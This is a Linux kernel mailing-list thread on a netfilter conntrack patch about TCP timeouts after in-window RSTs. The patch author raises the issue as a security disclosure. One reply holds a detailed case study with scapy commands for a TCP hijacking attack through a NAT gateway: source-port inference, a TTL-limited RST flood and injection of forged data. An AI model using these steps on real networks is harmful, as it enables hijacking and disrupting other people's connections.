diff mbox series

netfilter: conntrack: tcp: do not lower timeout to CLOSE for in-window RSTs

Message ID 20240705040013.29860-1-979093444@qq.com (mailing list archive)
State Awaiting Upstream
Delegated to: Netdev Maintainers
Headers show
Series netfilter: conntrack: tcp: do not lower timeout to CLOSE for in-window RSTs | expand

Checks

Context Check Description
netdev/series_format warning Single patches do not need cover letters; Target tree name not specified in the subject
netdev/tree_selection success Guessed tree name to be net-next
netdev/ynl success Generated files up to date; no warnings/errors; no diff in generated;
netdev/fixes_present success Fixes tag not required for -next series
netdev/header_inline success No static functions without inline keyword in header files
netdev/build_32bit success Errors and warnings before: 816 this patch: 816
netdev/build_tools success No tools touched, skip
netdev/cc_maintainers success CCed 8 of 8 maintainers
netdev/build_clang success Errors and warnings before: 821 this patch: 821
netdev/verify_signedoff success Signed-off-by tag matches author and committer
netdev/deprecated_api success None detected
netdev/check_selftest success No net selftest shell script
netdev/verify_fixes success No Fixes tag
netdev/build_allmodconfig_warn success Errors and warnings before: 821 this patch: 821
netdev/checkpatch warning WARNING: From:/Signed-off-by: email address mismatch: 'From: yyxRoy <yyxroy22@gmail.com>' != 'Signed-off-by: yyxRoy <979093444@qq.com>'
netdev/build_clang_rust success No Rust files in patch. Skipping build
netdev/kdoc success Errors and warnings before: 0 this patch: 0
netdev/source_inline success Was 0 now: 0
netdev/contest success net-next-2024-07-05--06-00 (tests: 695)

Commit Message

yyxRoy July 5, 2024, 4 a.m. UTC
With previous commit https://github.com/torvalds/linux/commit/be0502a
("netfilter: conntrack: tcp: only close if RST matches exact sequence")
to fight against TCP in-window reset attacks, current version of netfilter
will keep the connection state in ESTABLISHED, but lower the timeout to
that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
the peer to send a challenge ack to restore the connection timeout
(5 mins in tests).

However, malicious attackers can prevent incurring challenge ACKs by
manipulating the TTL value of RSTs. The attacker can probe the TTL value
between the NAT device and itself and send in-window RST packets with
a TTL value to be decreased to 0 after arriving at the NAT device.
This causes the packet to be dropped rather than forwarded to the
internal client, thus preventing a challenge ACK from being triggered.
As the window of the sequence number is quite large (bigger than 60,000
in tests) and the sequence number is 16-bit, the attacker only needs to
send nearly 60,000 RST packets with different sequence numbers
(i.e., 1, 60001, 120001, and so on) and one of them will definitely
fall within in the window.

Therefore we can't simply lower the connection timeout to 10 seconds
(rather short) upon receiving in-window RSTs. With this patch, netfilter
will lower the connection timeout to that of CLOSE only when it receives
RSTs with exact sequence numbers (i.e., old_state != new_state).

Signed-off-by: yyxRoy <979093444@qq.com>
---
 net/netfilter/nf_conntrack_proto_tcp.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

Comments

Florian Westphal July 5, 2024, 9:43 a.m. UTC | #1
yyxRoy <yyxroy22@gmail.com> wrote:
> With previous commit https://github.com/torvalds/linux/commit/be0502a
> ("netfilter: conntrack: tcp: only close if RST matches exact sequence")
> to fight against TCP in-window reset attacks, current version of netfilter
> will keep the connection state in ESTABLISHED, but lower the timeout to
> that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
> the peer to send a challenge ack to restore the connection timeout
> (5 mins in tests).
> 
> However, malicious attackers can prevent incurring challenge ACKs by
> manipulating the TTL value of RSTs. The attacker can probe the TTL value
> between the NAT device and itself and send in-window RST packets with
> a TTL value to be decreased to 0 after arriving at the NAT device.
> This causes the packet to be dropped rather than forwarded to the
> internal client, thus preventing a challenge ACK from being triggered.
> As the window of the sequence number is quite large (bigger than 60,000
> in tests) and the sequence number is 16-bit, the attacker only needs to
> send nearly 60,000 RST packets with different sequence numbers
> (i.e., 1, 60001, 120001, and so on) and one of them will definitely
> fall within in the window.
> 
> Therefore we can't simply lower the connection timeout to 10 seconds
> (rather short) upon receiving in-window RSTs. With this patch, netfilter
> will lower the connection timeout to that of CLOSE only when it receives
> RSTs with exact sequence numbers (i.e., old_state != new_state).

This effectively ignores most RST packets, which will clog up the
conntrack table (established timeout is 5 days).

I don't think there is anything sensible that we can do here.

Also, one can send train with data packet + rst and we will hit
the immediate close conditional:

   /* Check if rst is part of train, such as
    *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
    *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
    */
    if (ct->proto.tcp.last_index == TCP_ACK_SET &&
        ct->proto.tcp.last_dir == dir &&
        seq == ct->proto.tcp.last_end)
            break;

So even if we'd make this change it doesn't prevent remote induced
resets.

Conntrack cannot validate RSTs precisely due to lack of information,
only the endpoints can do this.
Jozsef Kadlecsik July 6, 2024, 4:16 p.m. UTC | #2
On Fri, 5 Jul 2024, Florian Westphal wrote:

> yyxRoy <yyxroy22@gmail.com> wrote:
> > With previous commit https://github.com/torvalds/linux/commit/be0502a
> > ("netfilter: conntrack: tcp: only close if RST matches exact sequence")
> > to fight against TCP in-window reset attacks, current version of netfilter
> > will keep the connection state in ESTABLISHED, but lower the timeout to
> > that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
> > the peer to send a challenge ack to restore the connection timeout
> > (5 mins in tests).
> > 
> > However, malicious attackers can prevent incurring challenge ACKs by
> > manipulating the TTL value of RSTs. The attacker can probe the TTL value
> > between the NAT device and itself and send in-window RST packets with
> > a TTL value to be decreased to 0 after arriving at the NAT device.
> > This causes the packet to be dropped rather than forwarded to the
> > internal client, thus preventing a challenge ACK from being triggered.
> > As the window of the sequence number is quite large (bigger than 60,000
> > in tests) and the sequence number is 16-bit, the attacker only needs to
> > send nearly 60,000 RST packets with different sequence numbers
> > (i.e., 1, 60001, 120001, and so on) and one of them will definitely
> > fall within in the window.
> > 
> > Therefore we can't simply lower the connection timeout to 10 seconds
> > (rather short) upon receiving in-window RSTs. With this patch, netfilter
> > will lower the connection timeout to that of CLOSE only when it receives
> > RSTs with exact sequence numbers (i.e., old_state != new_state).
> 
> This effectively ignores most RST packets, which will clog up the
> conntrack table (established timeout is 5 days).
> 
> I don't think there is anything sensible that we can do here.
> 
> Also, one can send train with data packet + rst and we will hit
> the immediate close conditional:
> 
>    /* Check if rst is part of train, such as
>     *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
>     *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
>     */
>     if (ct->proto.tcp.last_index == TCP_ACK_SET &&
>         ct->proto.tcp.last_dir == dir &&
>         seq == ct->proto.tcp.last_end)
>             break;
> 
> So even if we'd make this change it doesn't prevent remote induced
> resets.
> 
> Conntrack cannot validate RSTs precisely due to lack of information,
> only the endpoints can do this.

I fully agree with Florian: conntrack plays the role of a middle box and 
cannot absolutely know the right seq/ack numbers of the client/server 
sides. Add NAT on top of that and there are a couple of ways to attack a 
given traffic. I don't see a way by which the checkings/parameters could 
be tightened without blocking real traffic.
 
Best regards,
Jozsef
Florian Westphal July 6, 2024, 5:04 p.m. UTC | #3
Jozsef Kadlecsik <kadlec@blackhole.kfki.hu> wrote:
> I fully agree with Florian: conntrack plays the role of a middle box and 
> cannot absolutely know the right seq/ack numbers of the client/server 
> sides. Add NAT on top of that and there are a couple of ways to attack a 
> given traffic. I don't see a way by which the checkings/parameters could 
> be tightened without blocking real traffic.

I forgot about TCP timestamps, which we do not track at the moment.

But then there is a slight caveat: if one side exits, RST won't
carry timestamp option, so even keeping track of timestamps will help
:-(
yyxRoy July 8, 2024, 8:59 a.m. UTC | #4
On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote:
> Also, one can send train with data packet + rst and we will hit
> the immediate close conditional:
> 
>    /* Check if rst is part of train, such as
>     *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
>     *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
>     */
>     if (ct->proto.tcp.last_index == TCP_ACK_SET &&
>         ct->proto.tcp.last_dir == dir &&
>         seq == ct->proto.tcp.last_end)
>             break;
> 
> So even if we'd make this change it doesn't prevent remote induced
> resets.

Thank you for your time and prompt reply and for bringing to my attention the case
I had overlooked. I acknowledge that as a middlebox, Netfilter faces significant
challenges in accurately determining the correct sequence and acknowledgment
numbers. However, it is crucial to consider the security implications as well.

For instance, previously, an in-window RST could switch the mapping to the
CLOSE state with a mere 10-second timeout. The recent patch, 
 (netfilter: conntrack: tcp: only close if RST matches exact sequence),
has aimed to improve security by keeping the mapping in the established state
and extending the timeout to 300 seconds upon receiving a Challenge ACK.

However, this patch's efforts are still insufficient to completely prevent attacks.
As I mentioned, attackers can manipulate the TTL to prevent the peer from
responding to the Challenge ACK, thereby reverting the mapping to the
10-second timeout. This duration is quite short and potentially dangerous,
leading to various attacks, including TCP hijacking (I have included a detailed 
report on potential attacks if time permits). 
else if (unlikely(index == TCP_RST_SET))
       timeout = timeouts[TCP_CONNTRACK_CLOSE];

The problem is that current netfilter only checks if the packet has the RST flag
(index == TCP_RST_SET) and lowers the timeout to that of CLOSE (10 seconds only).
I strongly recommend implementing measures to prevent such vulnerabilities.
For example, in the case of an in-window RST, could we consider lowering
the timeout to 300 seconds or else?

Thank you for considering these points. Once again, thank you for your time and 
efforts in enhancing community security and usability.

Best regards,
Yuxiang
****************************************************************************************************************************************************************************************************

Here is a case study illustrating how a 10-second timeout can lead to a TCP hijacking attack for you if you are interested. I hope it won't waste your time and effort. Additionally, I hope the plain text format will clearly explain the situation. 

**General Disclosure: Linux Netfilter’s Vulnerability of Lacking Sufficient TCP Sequence Number Validation

1. Threat model
Figure 1 shows the threat model of the TCP hijacking attack. The victim client behind Linux with Netfilter enabled connect to the remote victim server using TCP to access online services. There will be a malicious inside attacker in the same LAN such as in the Wi-Fi or VPN NAT scenarios. The attacker can also control a machine with the ability of IP spoofing on the Internet. The malicious attacker in the LAN can hijack the TCP session between another client and the remote server, thereby terminating the original TCP connection or injecting forged messages into the connection, which may lead to denial of service attacks or privacy leakage attacks.

victim-client                                                      remote-server
             \                                                   /
              \                                                 /
               \                                               /
                ----------NAT device with Netfilter ----------
               /                                              \  
              /                                                \
             /                                                  \
local-attacker                                                    IP-spoofable-machine
                                                                  (controlled by the attacker)
Fig 1. Threat model of the TCP hijacking attack.

2. Experiment Setup
We will take VPN scenarios as the example cases in the disclosure. We create a test environment as shown in Fig.2. The machines are all equiped with Ubuntu 22.04 running the Linux kernel. We configured the NAT device as the VPN server with OpenVPN. And the client and attacker are connecting to it with OpenVPN.
The victim client establishes a TCP connection with the remote server (such as SSH connections or accessing web pages). Here we take a simple TCP connection as an example in which the client and server run the netcat program to establish a connection as follows.

vpn-client (tun0:10.8.0.3)                                                remote-server (eth0:43.159.39.110)
          \                                                                                          /
           \                                                                                        /
            \                                                                                      /
             ---- (tun0:10.8.0.1) vpn server (eth0:43.163.229.240)---
           /                                                                                       \  
         /                                                                                          \
        /                                                                                            \
local-attacker (tun0:10.8.0.2)                                         IP-spoofable-machine
                                                                                       (controlled by the attacker)

Fig 2. Testing environment.

The server starts the netcat service and listens to port 80.
------------------
remote-server@remote-server:~$sudo nc -l -p 80
hello,i'm client
HELLO,I'M SERVER
------------------
The victim establishes a TCP connection with the source port 40000
------------------
victim-client@victim-client:~$nc 43.159.39.110 80 -p 40000
hello,i'm client
HELL0,I'M SERVER
------------------
There will be a corresponding NAT mapping recoreded by Netfilter as follows:
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6431973 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
------------------


3.Attack Steps
3.1 In the first step, the attacker infers the TCP source port used by the victim.
(1) The attacker constructs a SYN packet from itself to the server with a guessed source port m. In most cases, the attacker cannot guess the right source port. For example, m is 50000.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst=43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=50000,dport=80,flags="S"),iface="tun0")
------------------
Netfilter will create a new NAT mapping to record the session as followed:
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1
tcp 6 115 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=50000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=50000 mark=0 use=1
------------------
Then the attacker can controlled its spoof machine to send a spoofed SYN/ACK packet as the server to the NAT device’s external IP address with the guessed port to verify it.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>>send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=50000,flags="SA"))
------------------
In this case, the SYN/ACK packet will match the attacker’s mapping and be forwarded to the attacker as it matches the second NAT mapping.
local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110
16:20:31.073779 tun0 Out IP (tos 0x0, ttl 2, id 1, offset 0, flags [none], proto TCP (6), length 40)
    10.8.0.2.50000 > 43.159.39.110.80:Flags [S], cksum Ox6f29(correct),seq 1, win 8192, length 0
16:22:11.608374 tun0 In IP (tos 0x64, ttl 54, id 1, offset 0, flags [none], proto TCP (6), length 40)
    43.159.39.110.80 > 10.8.0.2.50000:Flags [S.], cksum 0x6f19(correct),seq 1, ack 1, win 8192, length 0
------------------

(2) However, when the attacker guesses the right source port (i.e., 40000) to send the SYN packet.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst=43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=40000,dport=80,flags="S"),iface="tun0")
------------------
Netfilter will translate it to another random source port to deal with port collision. For example, it chooses 63503 and the NAT mapping is as followed.
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1
tcp 6 114 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=40000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=63503 mark=0 use=1
------------------
Then the attacker controls its spoof machine to send the verified SYN/ACK packet with guessed port 40000.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>>send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=40000,flags="SA"))
------------------
However, this time it will be forwarded to the victim client instead of the attacker as it will match the first NAT mapping

Finally, the attacker can find the source port used by the victim device by traversing the entire possible space of the source ports through the above-mentioned difference between guessing the source port correctly/wrongly, that is, whether it can receive the spoofed SYN/ACK packet.
 
3.2 In the second step, the attacker intercepts the message of the victim's current TCP connection to obtain the accurate sequence number and acknowledge number.
(1) Since current version of Netfilter does not check the sequence number strictly, an RST packet with an in-window sequence number can cause the change of the mapping state. With previous patch (https://github.com/torvalds/linux/commit/be0502a3f2e94211a8809a09ecbc3a017189b8fb) to fight against blind TCP reset attacks, instead of directly transferring the state of the NAT mapping to CLOSE with a 10-second timeout, the state will keep in the state of ESTABLISHED, but the timeout will still be decreased to 10 seconds. As the in-window RST will trigger the endpoint to respond with a Challenge ACK packet back, the timeout of the mapping will be updated to 300 seconds.
However, we find that the update of the timeout can be bypassed by the malicious attacker. The attacker can probe the TTL value between the NAT device and the spoof machine and send an in-window RST packet with a TTL value to be decreased to 0 after arriving at the NAT device, thus it will be dropped rather than forwarded to the victim client and no Challenge ACK will be triggered. Besides, as the window of the sequence number is quite large (bigger than 60,000 in our test) and the sequence number is 16-bit, the attacker only needs to send nearly 60,000 RST packets with different sequence numbers (i.e., 1, 60001, 120001, and so on) and one of them will definitely locate in the window.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>>send(IP(src="43.159.39.110",dst="43.163.229.240",ttl=10)/TCP(seq=1319804841+60000,ack=1,sport=80,dport=40000,flags="R"))
------------------
It only takes a rather short time (nearly 1-2 seconds) for current machines to send 60,000 RST packets. In this way, the NAT mapping will be quickly cleaned after the RST packets.
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1
VPN-server@VPN-server:~$#####After RST
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 10 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1
VPN-server@VPN-server:~$#####After 10 seconds
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 0 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED]mark=0 use=1
VPN-server@VPN-server:~$#####After that
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
------------------

(2) After the NAT mapping disappears, the attacker constructs a TCP data packet to the server. After NAT, it seems the same as those sent from the victim client. The server will respond an ACK packet back to the attacker, which contains the correct sequence and acknowledge numbers as shown below:
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst=43.159.39.110")/TCP(seq=1,ack=1,sport=40000,dport=80,flags="PA"),iface="tun0")

local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110
16:44:21.141636 tun0 Out IP (tos Ox0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40)
    10.8.0.2.40000 > 43.159.39.110.80: Flags [P.], cksum 0x9623 (correct), seq 1, ack 1, win 8192, length 0
16:44:21.255077 tun0 In IP (tos 0x64, ttl 54, id 20259, offset 0, flags [DF], proto TCP (6), length 52)
    43.159.39.110.80 >10.8.0.2.40000: Flags [.],cksum Ox651c (correct), seq 1319804847, ack 684909974, win 509, options[nop,nop,TS val 1722395496 ecr 995347412], length 0
------------------

3.3 In the third step, the attacker can use the obtained source port, sequence number, acknowledge number, etc. to choose to send an RST packet to terminate the original TCP connection (such as SSH service, etc.), inject fake messages into the original TCP connection to manipulate the sessions (such as Web HTTP pages, etc.), or send requests to the server.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst=43.159.39.110")/TCP(seq=684909974,ack=1319804847,sport=40000,dport=80,flags="PA")/"You are hijacked, send me money",iface="tun0")
------------------
On the server machine, the spoofed messages will be accepted as the sequence and acknowledgment numbers are right.
------------------
remote-server@remote-server:~$sudo nc -l -p 80
hello,i'm client
HELLO,I'M SERVER
You are hijacked, send me money
------------------------------
Florian Westphal July 8, 2024, 2:12 p.m. UTC | #5
yyxRoy <yyxroy22@gmail.com> wrote:
> On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote:
> > Also, one can send train with data packet + rst and we will hit
> > the immediate close conditional:
> > 
> >    /* Check if rst is part of train, such as
> >     *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
> >     *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
> >     */
> >     if (ct->proto.tcp.last_index == TCP_ACK_SET &&
> >         ct->proto.tcp.last_dir == dir &&
> >         seq == ct->proto.tcp.last_end)
> >             break;
> > 
> > So even if we'd make this change it doesn't prevent remote induced
> > resets.
> 
> Thank you for your time and prompt reply and for bringing to my attention the case
> I had overlooked. I acknowledge that as a middlebox, Netfilter faces significant
> challenges in accurately determining the correct sequence and acknowledgment
> numbers. However, it is crucial to consider the security implications as well.

Yes, but we have to make do with the information we have (or we can
observe) and we have to trade this vs. occupancy of the conntrack table.

> For instance, previously, an in-window RST could switch the mapping to the
> CLOSE state with a mere 10-second timeout. The recent patch, 
>  (netfilter: conntrack: tcp: only close if RST matches exact sequence),
> has aimed to improve security by keeping the mapping in the established state
> and extending the timeout to 300 seconds upon receiving a Challenge ACK.

be0502a3f2e9 ("netfilter: conntrack: tcp: only close if RST matches
exact sequence")?

Yes, that is a side effect.  It was about preventing nat mapping from going
away because of RST packet coming from an unrelated previous connection
(Carrier-Grade NAT makes this more likely, unfortunately).

I don't know how to prevent it for RST flooding with known address/port
pairs.

> However, this patch's efforts are still insufficient to completely prevent attacks.
> As I mentioned, attackers can manipulate the TTL to prevent the peer from
> responding to the Challenge ACK, thereby reverting the mapping to the
> 10-second timeout. This duration is quite short and potentially dangerous,
> leading to various attacks, including TCP hijacking (I have included a detailed 
> report on potential attacks if time permits). 
> else if (unlikely(index == TCP_RST_SET))
>        timeout = timeouts[TCP_CONNTRACK_CLOSE];
> 
> The problem is that current netfilter only checks if the packet has the RST flag
> (index == TCP_RST_SET) and lowers the timeout to that of CLOSE (10 seconds only).
> I strongly recommend implementing measures to prevent such vulnerabilities.

I don't know how.

We can track TTL/NH.
We can track TCP timestamps.

But how would we use such extra information?
E.g. what I we observe:

ACK, TTL 32
ACK, TTL 31
ACK, TTL 30
ACK, TTL 29

... will we just refuse to update TTL?
If we reduce it, any attacker can shrink it to needed low value
to prevent later RST from reaching end host.

If we don't, connection could get stuck on legit route change?
What about malicious entities injecting FIN/SYN packets rather than RST?

If we have last ts.echo from remote side, we can make it harder, but
what do if RST doesn't carry timestamp?

Could be perfectly legal when machine lost state, e.g. power-cycled.
So we can't ignore such RSTs.

> For example, in the case of an in-window RST, could we consider lowering
> the timeout to 300 seconds or else?

Yes, but I don't see how it helps.
Attacker can prepend data packet and we'd still move to close.

And I don't really want to change that because it helps to get rid
of stale connection with real/normal traffic.

I'm worried that adding cases where we do not act on RSTs will cause
conntrack table to fill up.
diff mbox series

Patch

diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
index ae493599a..d06259407 100644
--- a/net/netfilter/nf_conntrack_proto_tcp.c
+++ b/net/netfilter/nf_conntrack_proto_tcp.c
@@ -1280,7 +1280,8 @@  int nf_conntrack_tcp_packet(struct nf_conn *ct,
 	if (ct->proto.tcp.retrans >= tn->tcp_max_retrans &&
 	    timeouts[new_state] > timeouts[TCP_CONNTRACK_RETRANS])
 		timeout = timeouts[TCP_CONNTRACK_RETRANS];
-	else if (unlikely(index == TCP_RST_SET))
+	else if (unlikely(index == TCP_RST_SET) &&
+		 old_state != new_state)
 		timeout = timeouts[TCP_CONNTRACK_CLOSE];
 	else if ((ct->proto.tcp.seen[0].flags | ct->proto.tcp.seen[1].flags) &
 		 IP_CT_TCP_FLAG_DATA_UNACKNOWLEDGED &&